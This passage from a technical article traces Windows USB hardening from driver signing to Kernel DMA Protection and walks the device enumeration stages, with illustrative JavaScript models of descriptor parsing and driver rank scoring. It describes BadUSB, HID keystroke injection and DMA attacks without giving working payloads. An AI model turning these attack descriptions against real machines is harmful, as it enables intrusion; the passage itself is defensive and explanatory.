Why did none of these fixes survive structurally? Each was a single-bug closure. Disabling AutoRun did nothing about HID injection. Patching the LNK parser did nothing about the descriptor-parser surface. Signing kernel binaries did not change what those binaries trusted at runtime. Each fix shrank one bug class by one. The premise -- that a USB peripheral's self-declaration is its identity -- was untouched.

The post-2010 hardening of USB on Windows would change the surfaces around the descriptor parser. None of it would change the descriptor parser's contract.

4. Generation by Generation: Ten Acts of Hardening

The post-2010 hardening of USB on Windows is a ten-act story: signing, lockdown, watershed, silicon, policy. Each act addressed one premise, and exactly one premise, of the trust failure that came before it. None of them changed the foundational contract.

Generation 2 -- Vista x64 Kernel-Mode Code Signing (2007). Every USB function and class driver had to carry a signature chaining to a Microsoft-trusted root once 64-bit Vista landed; SHA-2 signatures became the norm only in later releases. Microsoft Learn carries the signing-by-version matrix and the cross-signed-CA carve-out verbatim, including the post-2015 narrowing in which "Cross-signed drivers are still permitted if ... The PC was upgraded from an earlier release of Windows to Windows 10, version 1607 ... Drivers was signed with an end-entity certificate issued prior to July 29th 2015 that chains to a supported cross-signed CA" [@ms-kmcs]. Companion documentation describes the broader driver-signing pipeline [@ms-drvsigning]. For the full reinvention of code-identity verification on Windows, the sibling article on Windows app identity is the canonical reference [@paragmali-appid].

Generation 3 -- AutoRun and LNK lockdown (2009-2011). Already covered in Section 3. KB971029 and MS10-046, taken together, closed the autorun.inf-driven AutoPlay vector and the LNK-icon parsing flaw used by Stuxnet [@krebs-feb2011] [@nvd-cve-2010-2568].

Generation 4 -- The descriptor-parser surface and the USB 3.0 stack (2011-2012). Andy Davis named the surface at Black Hat 2011 [@ncc-davis-2011]. Windows 8 in 2012 shipped a new USB 3.0 stack written from scratch on Microsoft's Kernel-Mode Driver Framework. The architectural reference confirms the rebuild verbatim: "Microsoft created the USB 3.0 drivers by using Kernel Mode Driver Framework (KMDF) interfaces ... Usbhub3.sys ... Manages USB hubs and their ports ... Enumerates devices and other hubs ... Creates physical device objects (PDOs)" [@ms-usb-3-0-stack]. The new stack changed the codebase the descriptor parser ran in. It did not change the contract the descriptor parser had to honor.

The Human Interface Device class is a USB device-class specification originally designed for keyboards, mice, joysticks, and similar input devices. A USB device declares itself HID by setting `bInterfaceClass=0x03` in its interface descriptor. Once Windows accepts that declaration, the device is allowed to inject keyboard and pointer events into the active session as if a human were operating a physical keyboard. The HID class has no provision for authenticating that the device is, in fact, a keyboard rather than a reprogrammed thumb drive emulating one; the class definition is itself the attack surface.

Generation 5 -- BadUSB watershed (Black Hat USA 2014). Karsten Nohl, Sascha Krißler, and Jakob Lell of SR Labs presented BadUSB -- On Accessories That Turn Evil [@nohl-wiki]. The SR Labs slide deck's title page is preserved verbatim, with all three authors named, on a mirrored PDF [@srlabs-badusb-pdf]; Wikipedia's BadUSB article also preserves the three-author attribution and the underlying primitive: "USB flash drives can contain a programmable Intel 8051 microcontroller" [@wiki-badusb]. Wired's contemporaneous press coverage credited only Nohl and Lell; Krißler's name was dropped in the popular write-up. Press attributions of conference talks routinely shed authors; the slide-deck title page is the durable source. Two months after Black Hat, Adam Caudill and Brandon Wilson released the Psychson toolchain at DerbyCon 2014, demonstrating end-to-end reflash of the Phison PS2251-03 controller. The repository README confirms the lineage verbatim: "this is 8051 custom firmware written in C ... firmware patches have only been tested against PS2251-03 firmware version 1.03.53 ... DriveCom ... EmbedPayload ... Injector ... Huge thanks to the Hak5 team for their work on the excellent USB Rubber Ducky" [@psychson-repo]. Wired's October 2014 follow-up carries Caudill's verbatim release rationale from the DerbyCon stage: "The belief we have is that all of this should be public. It shouldn't be held back. So we're releasing everything we've got" [@wired-2014-10]. The same article quotes Nohl's verbatim architectural verdict on the underlying protocol: "to prevent USB devices' firmware from being rewritten, their security architecture would need to be fundamentally redesigned ... it could take 10 years or more to iron out the USB standard's bugs and pull existing vulnerable devices out of circulation" [@wired-2014-10].

It could take 10 years or more to iron out the USB standard's bugs and pull existing vulnerable devices out of circulation. -- Karsten Nohl, SR Labs, quoted in Wired, October 2014 [@wired-2014-10]

Generation 6 -- HID-as-weapon era (2010-present). The Hak5 USB Rubber Ducky -- introduced in 2010 by Hak5 founder Darren Kitchen, who pioneered the keystroke-injection technique [@hak5-ducky-docs] -- commercialized the HID-injection primitive four years before BadUSB was disclosed. The Mark II hardware is still sold today [@hak5-shop-ducky], and DuckyScript v1 (2011) and v3 (2022) are documented end-to-end on the Hak5 documentation portal [@hak5-ducky-docs]. By the time BadUSB hit Black Hat in August 2014, Hak5 had already been selling a packaged keystroke-injection thumb drive at consumer prices. "BadUSB" academicized what penetration testers were already shipping in mailers. The O.MG Cable, released by Mischief Gadgets, embedded the implant inside a USB-A-to-Lightning charging cable form factor and put a WiFi beacon inside it. The product page states the design intent verbatim: "O.MG Cables are hand made USB cables with an advance WiFi implant inside. Designed to allow Red Teams to emulate sophisticated attack scenarios previously only capable with $20,000 cables" [@omg-cable]. The FBI's March 2020 FLASH alert -- reported by BleepingComputer at the time -- confirmed organized cybercriminal actors mailing the same primitive: "Hackers from the FIN7 cybercriminal group have been targeting various businesses with malicious USB devices acting as a keyboard when plugged into a computer ... These USB drives are configured to emulate keystrokes that launch a PowerShell command to retrieve malware from server controlled by the attacker" [@bleeping-fin7]. The FBI repeated the warning with a follow-on FLASH alert in January 2022 that extended the targeting to transportation, insurance, and defense companies [@wiki-badusb].

Generation 7 -- Thunderbolt DMA and Thunderclap (NDSS 2019), Thunderspy (2020). Theodore Markettos, Colin Rothwell, Brett Gutstein, Allison Pearce, Peter Neumann, Simon Moore, and Robert Watson of Cambridge, Rice, and SRI demonstrated peripheral DMA attacks against IOMMU-on platforms via shared-IOMMU-context attacks. Their NDSS 2019 paper concludes verbatim: "Windows only uses the IOMMU in limited cases and remains vulnerable" [@ndss-thunderclap]. One year later, Björn Ruytenberg of Eindhoven University released Thunderspy, a family of seven vulnerabilities extending the attack surface to firmware-reflash of the Thunderbolt controller itself: "All the attacker needs is 5 minutes alone with the computer, a screwdriver, and some easily portable hardware" [@thunderspy]. Wikipedia preserves the May 10, 2020 disclosure date [@thunderspy-wiki].

Generation 8 -- Kernel DMA Protection (Windows 10 1803, April 2018). This is the first Windows USB-adjacent defense that targeted trust below the descriptor parser rather than the parser itself. Microsoft Learn names the primitive verbatim: "Windows uses the system Input/Output Memory Management Unit (IOMMU) to block external peripherals from starting and performing DMA, unless the drivers for these peripherals support memory isolation (such as DMA-remapping) ... By default, peripherals with DMA Remapping incompatible drivers are blocked from starting and performing DMA until an authorized user signs into the system or unlocks the screen" [@ms-kdp]. Per-driver opt-in is documented separately [@ms-dmaremap]. The same Microsoft Learn page is explicit about what KDP does not defend: "Kernel DMA Protection feature doesn't protect against DMA attacks via 1394/FireWire, PCMCIA, CardBus, or ExpressCard". A USB 2.0 thumb drive performs no DMA at all; KDP is silent on it.

Kernel DMA Protection is the Windows defense that uses the platform's IOMMU (Intel VT-d, AMD-Vi, or an ARM equivalent) to confine externally connected PCIe-class peripherals to device-private memory windows. With KDP armed, a Thunderbolt or USB4 peripheral cannot read arbitrary kernel memory by issuing DMA requests, even if its driver is malicious or buggy. KDP is opt-in at three levels: silicon (the platform must have an IOMMU), firmware (the UEFI must publish DMAR / IVRS tables), and driver (the driver must declare `DmaRemappingCompatible=1` in its INF). KDP does not protect against attacks delivered through descriptor parsing, HID injection, or mass-storage exfiltration.

Generation 9 -- USB Type-C UCM stack (Windows 10 1607, 2016). The USB Connector Manager (UCM) class extension family -- UcmCx.sys, UcmUcsiCx.sys, UcmTcpciCx.sys -- brought Power Delivery, Alternate Mode (DisplayPort, Thunderbolt, USB4), and bidirectional power-role negotiation into the Windows driver model. Microsoft Learn names the architecture verbatim: "UCM is designed by using the WDF class extension-client driver model" [@ms-typec].

Generation 10 -- Defender, ASR, and Device Control unification (2018-2024). The Attack Surface Reduction rule set, documented in Microsoft's ASR-rule-to-GUID matrix [@ms-asr-rules], includes the rule Block untrusted and unsigned processes that run from USB with GUID b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4. Microsoft Defender for Endpoint Device Control followed, generally available in 2024, with per-VID/PID, per-serial-number, per-operation, and per-user policy primitives [@ms-devcontrol]. Together with the older Group Policy Device Installation Restrictions framework [@ms-gpo-devinstall] and the system-defined Device Setup Class GUIDs [@ms-devsetupclasses], these form the deployable enterprise triangle around the BadUSB / HID-injection problem.

timeline
    title Ten generations of Windows USB hardening
    1996 : Gen 1 : Original USB stack ships ; unsigned 32-bit drivers
    2007 : Gen 2 : KMCS on Vista x64 ; mandatory signed kernel binaries
    2009-2011 : Gen 3 : AutoRun and LNK lockdown ; KB971029 and MS10-046
    2011 : Gen 4 : Andy Davis names the descriptor parser surface
    2012 : Gen 4 cont. : USB 3.0 KMDF stack ships in Windows 8
    2014 : Gen 5 : BadUSB watershed ; SR Labs at Black Hat
    2010-2024 : Gen 6 : HID-as-weapon era ; Rubber Ducky to O.MG Cable
    2019-2020 : Gen 7 : Thunderclap and Thunderspy ; IOMMU is not enough
    2018 : Gen 8 : Kernel DMA Protection ; Windows 10 1803
    2016 : Gen 9 : USB Type-C UCM stack ; Windows 10 1607
    2018-2024 : Gen 10 : ASR, Device Control, GPO triangle ; Defender for Endpoint

Sources, in row order: [@ms-usb-3-0-stack] for the USB 2.0 stack and the USB 3.0 KMDF rewrite; [@ms-kmcs] for the Vista x64 signing transition; [@krebs-feb2011] and [@nvd-cve-2010-2568] for the AutoRun-and-LNK lockdown; [@ncc-davis-2011] for the Andy Davis Black Hat 2011 talk; [@srlabs-badusb-pdf] and [@wiki-badusb] for the BadUSB three-author SR Labs disclosure; [@hak5-shop-ducky], [@hak5-ducky-docs], [@omg-cable], and [@bleeping-fin7] for the HID-as-weapon lineage; [@ndss-thunderclap] and [@thunderspy] for the IOMMU attack family; [@ms-kdp] and [@ms-dmaremap] for Kernel DMA Protection; [@ms-typec] for the Type-C UCM stack; [@ms-asr-rules], [@ms-devcontrol], [@ms-gpo-devinstall], and [@ms-devsetupclasses] for the modern enterprise policy triangle.

Note: Ten generations of Windows USB hardening. Signing on top, IOMMU underneath, policy frameworks around the edges. Every one of them addressed a surface adjacent to the descriptor parser. None addressed the contract the descriptor parser has to honor: that the peripheral's self-declared identity is the only identity the host gets. Until USB-IF Authentication 1.0 ships in commodity silicon, that contract is going to outlast every defense in this section.

Ten generations of hardening, each closing a single attack surface, each leaving the descriptor-trust contract intact. The single defense that should close it -- USB-IF Authentication 1.0, published January 2019 -- is the next section's reckoning.

5. The Modern USB Stack as a Multi-Stage Verifier

We have walked forty years of inheritance and ten generations of layered hardening. Now we are going to do the thing the rest of this article rests on: walk a single USB device, from the millisecond it makes electrical contact to the moment a class driver attaches to it, through the nine stages Windows 11 25H2 actually executes -- by named binary, by descriptor, by trust decision.

Those nine stages are a reorganisation of §1's eleven kernel-mode operations, not a different list. §1's three physical-detection operations -- port-status interrupt, port reset, speed detection -- fuse into Stage 1; §1's three default-address descriptor operations (initial 8-byte fetch, SET_ADDRESS, full 18-byte fetch) fuse into Stage 2; §1's combined INF-search-and-KMCS operation splits into Stages 6 and 7; and a new Stage 9 covers the IOMMU enforcement Kernel DMA Protection performs after the class driver attaches. The arithmetic is eleven minus two minus two plus one plus one equals nine. The StudyGuide question 1 at the foot of this article retains the §1 framing for exam purposes; the per-stage walk below uses the §5 reorganisation.

sequenceDiagram
    participant Dev as USB device
    participant XHCI as usbxhci.sys (host controller)
    participant Hub as usbhub3.sys (hub driver)
    participant CCGP as usbccgp.sys (composite parent)
    participant PnP as PnP manager
    participant IO as I/O manager
    participant Cls as Class driver (e.g. hidclass.sys)
    Dev->>XHCI: Stage 1 -- electrical attach + port status change
    XHCI->>Dev: Port reset + speed detection
    XHCI->>Hub: New device on port N (default address 0)
    Hub->>Dev: Stage 2 -- GET_DESCRIPTOR (device, first 8 bytes)
    Hub->>Dev: SET_ADDRESS
    Hub->>Dev: GET_DESCRIPTOR (device, full 18 bytes)
    Hub->>Dev: Stage 3 -- GET_DESCRIPTOR (config, first 9 bytes)
    Hub->>Dev: GET_DESCRIPTOR (config, full wTotalLength)
    Hub->>CCGP: Stage 4 -- composite split (if bDeviceClass=0x00 or IAD present)
    CCGP->>PnP: Per-interface PDOs
    PnP->>PnP: Stage 5 -- synthesize hardware + compatible IDs
    PnP->>PnP: Stage 6 -- INF database search with rank scoring
    PnP->>IO: Stage 7 -- KMCS check on chosen function driver
    IO->>Cls: Stage 8 -- attach class driver to device node
    IO->>IO: Stage 9 -- IOMMU policy (KDP, if armed)

The sources for each stage are cited inline in the prose that follows. We will walk all nine.

Stage 1: Physical detection (`usbxhci.sys`)

The xHCI host controller's hardware raises a port-status-change interrupt when a downstream port detects electrical attach. The host-controller driver -- usbxhci.sys on Windows 8 and newer -- handles the interrupt, drives the port through a reset, and detects the device's negotiated speed: Low Speed (1.5 Mbps), Full Speed (12 Mbps), High Speed (480 Mbps), SuperSpeed (5 Gbps), or SuperSpeed+ (10 Gbps and beyond) [@wiki-usb]. Microsoft's architecture documentation names the driver verbatim: "The xHCI driver is the USB 3.0 host controller driver", and pairs it with the framework-derived host-controller extension Ucx01000.sys [@ms-usb-3-0-stack]. The device, at this point, has no identity. It has a port number and a speed. It does not yet have a USB bus address; it lives at the default address (zero) until the hub assigns one.

Stage 2: Initial device-descriptor fetch (`usbhub3.sys`)

The hub driver, usbhub3.sys, issues the first control transfer. The request is bmRequestType=0x80, bRequest=GET_DESCRIPTOR, wValue=0x0100, wLength=8 -- "give me the first eight bytes of the device descriptor at default address zero." The first eight bytes carry the bMaxPacketSize0 field, which tells the host how to size subsequent control transfers. SET_ADDRESS assigns a real bus address. A second GET_DESCRIPTOR then retrieves the full eighteen-byte USB_DEVICE_DESCRIPTOR.
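The request fields above map onto the 8-byte SETUP packet that every USB control transfer begins with, and the eighteen-byte reply can be decoded by fixed offsets. The following is a minimal sketch of that wire format only, not of usbhub3.sys internals; the function names `buildGetDeviceDescriptor` and `parseDeviceDescriptor` are hypothetical, and the sample bytes are invented for illustration (the VID and PID are borrowed from the Kingston worked example in Stage 6).

```javascript
// Sketch only: models the USB wire format, not the Windows hub driver.
const GET_DESCRIPTOR = 0x06;    // standard request code
const DESC_TYPE_DEVICE = 0x01;  // descriptor type, carried in the high byte of wValue

// Build the 8-byte SETUP packet; multi-byte fields are little-endian.
function buildGetDeviceDescriptor(wLength) {
  const buf = new Uint8Array(8);
  const view = new DataView(buf.buffer);
  view.setUint8(0, 0x80);                          // bmRequestType: device-to-host, standard, device
  view.setUint8(1, GET_DESCRIPTOR);                // bRequest
  view.setUint16(2, DESC_TYPE_DEVICE << 8, true);  // wValue = 0x0100
  view.setUint16(4, 0, true);                      // wIndex
  view.setUint16(6, wLength, true);                // wLength
  return buf;
}

// Decode the 18-byte device descriptor, rejecting malformed input
// instead of trusting the device-supplied length byte.
function parseDeviceDescriptor(bytes) {
  if (bytes.length < 18) throw new RangeError("short device descriptor");
  if (bytes[0] !== 18 || bytes[1] !== DESC_TYPE_DEVICE) {
    throw new Error("bad bLength or bDescriptorType");
  }
  const view = new DataView(bytes.buffer, bytes.byteOffset, bytes.byteLength);
  return {
    bcdUSB: view.getUint16(2, true),
    bDeviceClass: bytes[4],
    bDeviceSubClass: bytes[5],
    bDeviceProtocol: bytes[6],
    bMaxPacketSize0: bytes[7],   // the field the first 8-byte fetch exists to learn
    idVendor: view.getUint16(8, true),
    idProduct: view.getUint16(10, true),
    bcdDevice: view.getUint16(12, true),
    bNumConfigurations: bytes[17],
  };
}

// Illustrative descriptor bytes (not captured from real hardware).
const sampleDescriptor = Uint8Array.from([
  18, 1, 0x00, 0x02, 0, 0, 0, 64,
  0x51, 0x09, 0x66, 0x16, 0x00, 0x01, 1, 2, 3, 1,
]);
const firstFetch = buildGetDeviceDescriptor(8);
const device = parseDeviceDescriptor(sampleDescriptor);
console.log(Array.from(firstFetch), device);
```

Every field in the returned object is copied straight from bytes the peripheral chose to send, which is the one-way trust relationship this stage establishes.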

This is the descriptor parser's first contact with attacker-controlled bytes -- the surface Andy Davis demonstrated as exploitable at Black Hat 2011 [@ncc-davis-2011]. The binary doing the parsing is usbhub3.sys, the same hub driver §4 Generation 4 names verbatim from the architecture reference [@ms-usb-3-0-stack]. The hub driver runs in ring zero. The bytes it parses originate in the peripheral's firmware. The trust contract is one-way.

Stage 3: Configuration-descriptor fetch

The hub driver issues a third GET_DESCRIPTOR for the first nine bytes of USB_CONFIGURATION_DESCRIPTOR to learn the wTotalLength field; a fourth fetch retrieves the full configuration, which includes one or more USB_INTERFACE_DESCRIPTORs, each followed by its USB_ENDPOINT_DESCRIPTORs and any class-specific descriptors (HID report descriptors, mass-storage CSW formats, audio control units). The two-fetch pattern -- read nine bytes to learn the size, then re-read the full block -- is a perfectly sensible engineering optimization. It also doubles the number of attacker-controlled parser entries the hub driver executes per insertion. The pragmatic optimization and the widened attack surface are the same line of code. All of this is parsed in usbhub3.sys [@ms-usb-3-0-stack]. This stage is the bulk of the kernel's adversarial-input surface for USB.
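To make the parsing hazard concrete, here is a hedged sketch of a defensive walk over a configuration blob. It is not how usbhub3.sys is implemented; the function name `walkConfiguration` and the sample bytes are assumptions made for illustration. The point is that both `wTotalLength` and every `bLength` are device-supplied and each needs a bounds check.

```javascript
// Sketch only: a defensive walk over a configuration descriptor blob.
const DESC_TYPE_CONFIGURATION = 0x02;

function walkConfiguration(bytes) {
  if (bytes.length < 9 || bytes[0] < 9 || bytes[1] !== DESC_TYPE_CONFIGURATION) {
    throw new Error("not a configuration descriptor");
  }
  // wTotalLength is little-endian and entirely device-controlled.
  const wTotalLength = bytes[2] | (bytes[3] << 8);
  if (wTotalLength > bytes.length) {
    throw new RangeError("wTotalLength exceeds bytes received");
  }

  const found = [];
  let offset = 0;
  while (offset < wTotalLength) {
    if (offset + 2 > wTotalLength) throw new RangeError("truncated descriptor header");
    const bLength = bytes[offset];
    const bDescriptorType = bytes[offset + 1];
    // bLength below 2 would stall or misalign the walk; an oversized
    // bLength would read past the end of the blob.
    if (bLength < 2 || offset + bLength > wTotalLength) {
      throw new RangeError("bad bLength at offset " + offset);
    }
    found.push({ offset, bLength, bDescriptorType });
    offset += bLength;
  }
  return found;
}

// Illustrative blob: configuration (9) + interface (9) + endpoint (7) = 25 bytes.
const sampleConfig = Uint8Array.from([
  9, 2, 25, 0, 1, 1, 0, 0x80, 50,
  9, 4, 0, 0, 1, 0x08, 0x06, 0x50, 0,
  7, 5, 0x81, 0x02, 0x00, 0x02, 0,
]);
console.log(walkConfiguration(sampleConfig).map(d => d.bDescriptorType));
```

A parser that skips either check is one crafted descriptor away from an infinite loop or an out-of-bounds read, which is the bug class descriptor fuzzing targets.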

A composite USB device is a single physical peripheral that declares multiple independent interfaces. A common pattern is a wireless-keyboard-and-mouse receiver that presents one USB interface for the keyboard and a second for the mouse. The host treats each interface as a separate logical device and binds a class driver to each. Composite-device handling is the structural primitive that makes the BadUSB *"mass storage device that also presents a HID keyboard interface"* attack possible inside an unmodified USB peripheral.

Stage 4: Composite-device split (`usbccgp.sys`)

If the device descriptor's bDeviceClass is 0x00 (deferred to interface), or its bDeviceClass / bDeviceSubClass / bDeviceProtocol triple is 0xEF / 0x02 / 0x01 (the Multi-Interface Function class signalled by Interface Association Descriptors), and the device has more than one interface and a single configuration, the hub bus driver synthesizes an additional compatible ID of USB\COMPOSITE. The PnP manager's INF search then matches that compatible ID against Usb.inf and loads the generic parent driver. Microsoft Learn states the architecture verbatim: "the USB generic parent driver (Usbccgp.sys) ... the generic parent driver enumerates each of these interfaces as a separate device" [@ms-ccgp]; the USB 3.0 architecture page is verbatim about which layer does the synthesis: "The hub driver enumerates and loads the parent composite driver if deviceClass is 0 or 0xef and numInterfaces is greater than 1 in the device descriptor" [@ms-usb-3-0-stack]. usbccgp.sys then creates one child physical device object (PDO) per interface and lets the PnP manager bind a class driver to each independently. This is the moment a single physical thumb drive can become a thumb drive and a HID keyboard. Nothing in this stage cross-checks whether the combination is a plausible product; the device has declared it, and the host honors the declaration.
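The conditions in the paragraph above reduce to a short predicate. The sketch below is an illustrative model, not the hub driver's code: the object shape (`numInterfaces`, `numConfigurations`, `interfaces`) and the function names are hypothetical, chosen only to mirror the prose.

```javascript
// Sketch only: the documented conditions for loading the composite parent.
function loadsCompositeParent(d) {
  const classDeferred = d.bDeviceClass === 0x00;
  const multiInterfaceFunction =
    d.bDeviceClass === 0xef && d.bDeviceSubClass === 0x02 && d.bDeviceProtocol === 0x01;
  return (classDeferred || multiInterfaceFunction) &&
    d.numInterfaces > 1 &&
    d.numConfigurations === 1;
}

// One child PDO per declared interface. Note what is absent: no check
// that the combination of interface classes is a plausible product.
function childPdos(d) {
  if (!loadsCompositeParent(d)) return [];
  return d.interfaces.map((iface, i) => ({
    interfaceNumber: i,
    bInterfaceClass: iface.bInterfaceClass,
  }));
}

// Hypothetical BadUSB-style device: mass storage (0x08) plus HID (0x03).
const thumbDriveWithKeyboard = {
  bDeviceClass: 0x00, bDeviceSubClass: 0x00, bDeviceProtocol: 0x00,
  numInterfaces: 2, numConfigurations: 1,
  interfaces: [{ bInterfaceClass: 0x08 }, { bInterfaceClass: 0x03 }],
};
console.log(childPdos(thumbDriveWithKeyboard));
```

The model has no branch that rejects the storage-plus-keyboard pairing, matching the prose: the declaration is honored as given.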

Stage 5: Hardware-ID and compatible-ID synthesis

The PnP manager builds two ordered lists from the descriptor fields it just parsed:

Hardware IDs (most specific): USB\VID_xxxx&PID_xxxx&REV_xxxx, USB\VID_xxxx&PID_xxxx, and for composite devices USB\VID_xxxx&PID_xxxx&MI_xx (interface number) [@ms-hwids].
Compatible IDs (fallback): USB\Class_xx&SubClass_xx&Prot_xx, then USB\Class_xx&SubClass_xx, then USB\Class_xx [@ms-compatids].

A hardware ID is the most specific identifier the Plug-and-Play manager uses to bind a driver to a device. For USB, the canonical hardware ID is `USB\VID_xxxx&PID_xxxx&REV_xxxx`, derived directly from the device descriptor's `idVendor`, `idProduct`, and `bcdDevice` fields. A driver INF that names a hardware ID exactly will outrank any compatible-ID match in the rank-scored search; vendors use this to ship a vendor-specific function driver for their own hardware.

A compatible ID is a generic identifier the Plug-and-Play manager falls back to when no driver INF names the device's hardware ID. For USB, compatible IDs are class-coded: `USB\Class_03&SubClass_01&Prot_01` is a boot-protocol keyboard, `USB\Class_08&SubClass_06&Prot_50` is a SCSI-transparent mass-storage device. The inbox Microsoft class drivers (`hidusb.sys`, `usbstor.sys`, and so on) are registered against compatible IDs, which is why an unbranded thumb drive with no vendor INF still gets a working class driver on Windows.
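The two lists can be sketched as plain string formatting over descriptor fields. This is a simplified model under stated assumptions: the helper names `hardwareIds` and `compatibleIds` are hypothetical, the field widths follow the patterns shown above (four hex digits for VID, PID, and REV; two for class codes and the interface number), and the `&MI_xx` suffix handling for composite interfaces is an approximation of the pattern listed earlier.

```javascript
// Sketch only: ID strings built from descriptor fields, most specific first.
const hex = (n, width) => n.toString(16).toUpperCase().padStart(width, "0");

function hardwareIds(d, interfaceNumber) {
  const base = "USB\\VID_" + hex(d.idVendor, 4) + "&PID_" + hex(d.idProduct, 4);
  const ids = [base + "&REV_" + hex(d.bcdDevice, 4), base];
  // For a composite device's child interface, append the interface number.
  return interfaceNumber === undefined
    ? ids
    : ids.map(id => id + "&MI_" + hex(interfaceNumber, 2));
}

function compatibleIds(cls, subClass, protocol) {
  const c = "USB\\Class_" + hex(cls, 2);
  const s = c + "&SubClass_" + hex(subClass, 2);
  return [s + "&Prot_" + hex(protocol, 2), s, c];
}

// Illustrative values; the VID/PID match the Kingston worked example in Stage 6.
const stick = { idVendor: 0x0951, idProduct: 0x1666, bcdDevice: 0x0100 };
console.log(hardwareIds(stick));
console.log(compatibleIds(0x08, 0x06, 0x50));
```

Nothing in either function consults anything but the device's own declaration, so a reprogrammed controller can choose which INF it matches simply by choosing these numbers.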

Stage 6: INF database search with rank scoring

The PnP manager hands the two lists to the driver-store INF search. The algorithm is documented under "How Setup Selects Drivers" [@ms-pnp-rank] and is rank-arithmetic: each candidate INF is assigned a 32-bit rank, lowest wins. Roughly speaking, the rank is composed from three terms: an ID-match term (hardware-ID hit beats compatible-ID hit, and a higher hardware-ID in the list beats a lower one), a signer-trust term (a Microsoft-signed driver outranks a third-party-signed driver of equal ID specificity), and an OS-version term. The chosen INF's [Models] section names the function driver [@ms-inf]. The two-phase driver-package model (introduced in Windows 8) first installs the best driver-store match for fast operation, then queries Windows Update separately for a potentially better match [@ms-pnp-rank].

Worked example. A USB Mass Storage device exposes hardware ID USB\VID_0951&PID_1666 (a Kingston DataTraveler) and compatible ID USB\Class_08&SubClass_06&Prot_50 (SCSI-transparent bulk-only). The driver store contains the Microsoft inbox INF (usbstor.inf) registered against the compatible ID and signed by Microsoft, and a third-party INF registered against the hardware ID and signed by a paid-up OEM. The rank arithmetic decides which one wins.

flowchart TD
    Dev["Device exposes:<br/>HWID=USB\VID_0951&PID_1666<br/>CompatID=USB\Class_08&SubClass_06&Prot_50"]
    Dev --> Store["Driver store search"]
    Store --> A["Candidate A: usbstor.inf<br/>Match on CompatID<br/>Signer: Microsoft (rank 0x00)"]
    Store --> B["Candidate B: vendor.inf<br/>Match on HWID<br/>Signer: OEM (rank 0x01)"]
    A --> ARank["A.rank = HWID_RANK_BASE + CompatID_term + 0x00<br/>= 0x0000 + 0x1003 + 0x00<br/>= 0x1003"]
    B --> BRank["B.rank = HWID_term + Signer_term<br/>= 0x0000 + 0x01<br/>= 0x0001"]
    ARank --> D{"Compare ranks (lowest wins)"}
    BRank --> D
    D --> Win["B wins: vendor.inf binds to USB\VID_0951&PID_1666"]

The exact numeric constants are policy-controlled and vary by Windows version; the structural ordering is documented [@ms-pnp-rank] [@ms-hwids] [@ms-compatids] [@ms-inf]. The takeaway is that a USB device with no hardware-ID-specific INF in the driver store always falls back to the Microsoft inbox class driver matched on compatible ID, which is why an arbitrary thumb drive declaring bInterfaceClass=0x08 always finds usbstor.sys ready to load.

{`
// Simplified model of the documented rank-scoring algorithm.
// Lower numeric rank wins; the exact constants are version-policy controlled.

const HWID_BASE = 0x0000;
const COMPATID_BASE = 0x1000;
const POSITION_STEP = 0x0001;
const SIGNER = { MICROSOFT: 0x00, OEM: 0x01, THIRD_PARTY: 0x02, UNSIGNED: 0x80 };

// rank = ID-match term + list-position term + signer-trust term
function rank(match) {
  const idTerm = match.kind === "HWID" ? HWID_BASE : COMPATID_BASE;
  const positionTerm = match.position * POSITION_STEP;
  return idTerm + positionTerm + SIGNER[match.signer];
}

const candidates = [
  { name: "usbstor.inf (Microsoft inbox)", kind: "COMPATID", position: 3, signer: "MICROSOFT" },
  { name: "vendor.inf (Kingston OEM)", kind: "HWID", position: 0, signer: "OEM" },
];

// Score every candidate, then sort ascending so the winner comes first.
const ranked = candidates
  .map(c => ({ ...c, rank: rank(c) }))
  .sort((a, b) => a.rank - b.rank);

for (const c of ranked) {
  console.log("rank=0x" + c.rank.toString(16).padStart(4, "0") + " " + c.name);
}
console.log("Winner:", ranked[0].name);
`}

Stage 7: KMCS verification of the chosen driver

The function driver named in the winning INF is loaded. Before the I/O manager attaches it, the loader checks its signature against the Kernel-Mode Code Signing policy: signature must chain to a Microsoft-trusted root, use SHA-256, and -- if Hypervisor-Enforced Code Integrity is enabled -- pass HVCI's per-page integrity check. The driver block list and the vulnerable-driver block list are consulted. The full signing-by-version matrix is documented on Microsoft Learn [@ms-kmcs] [@ms-drvsigning].

This is the canonical aha moment of the article. Kernel-Mode Code Signing certifies the driver. It does not certify what the driver consumes.

Imagine the system from KMCS's point of view. The Microsoft-signed `hidclass.sys` arrives at the kernel-mode loader. Its signature chains to a Microsoft-trusted root, its hash is correct, the HVCI memory-integrity policy is satisfied. Everything KMCS is asked to verify is verified. `hidclass.sys` loads.

At runtime, hidclass.sys accepts whatever HID input event arrives on the wire. The bytes that arrive carry no signature. The peripheral that produced them was never authenticated. KMCS protects the kernel from a malicious driver; the threat model assumes the data the driver consumes is honest. Against BadUSB, that assumption is exactly backwards. The signed hidclass.sys is the attacker's tool: it is the binary that injects the malicious keystrokes into the active session.

KMCS is not broken. The work it does is real and necessary; without it, the BadUSB primitive would also let an attacker load arbitrary .sys files. KMCS just does not solve, and is not in the threat model of, the descriptor-trust problem. That gap is the article's recurring point.

Stage 8: Class-driver attachment

With the rank scoring decided and the function driver KMCS-verified, the I/O manager attaches the driver to the new device node and the class driver begins serving I/O. The function driver is drawn from the inbox class-driver roster catalogued in §6 -- hidclass.sys and hidusb.sys for HID; usbstor.sys for mass storage; winusb.sys for vendor-specific generic access via the Microsoft OS Descriptor mechanism [@ms-winusb]; the UcmCx.sys family for Type-C connector management [@ms-typec]; and the rest of the inbox roster in §6 [@ms-usb-3-0-stack]. This is the moment a USB device transitions from a parsed PDO to a binding that exposes per-class I/O semantics to user mode -- the point at which descriptor-trust becomes operational rather than merely synthesised.

Stage 9: IOMMU enforcement (Kernel DMA Protection)

If Kernel DMA Protection is armed and the device is externally connected via a PCIe-tunneling fabric (Thunderbolt 3, Thunderbolt 4, USB4), the platform IOMMU places the device behind a device-specific translation domain. A device whose driver opted in with DmaRemappingCompatible=1 in its INF can perform DMA only into its own sandboxed memory [@ms-dmaremap]. A device whose driver did not opt in is blocked from starting and performing DMA until a user signs in or unlocks the screen. This is the IOMMU-mediated peripheral confinement quoted verbatim in §4 Generation 8 [@ms-kdp]. The deeper architectural treatment of Windows's hypervisor-enforced isolation primitives lives in the sibling article on the secure kernel and Virtualization-Based Security.
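As a rough decision table, the default behavior Microsoft Learn describes in the passage quoted in §4 Generation 8 can be sketched as follows. This is one reading of that quote, not an implementation of the Windows policy engine; the function name, the parameter names, and the result labels are all hypothetical.

```javascript
// Sketch only: a reading of the default Kernel DMA Protection behavior.
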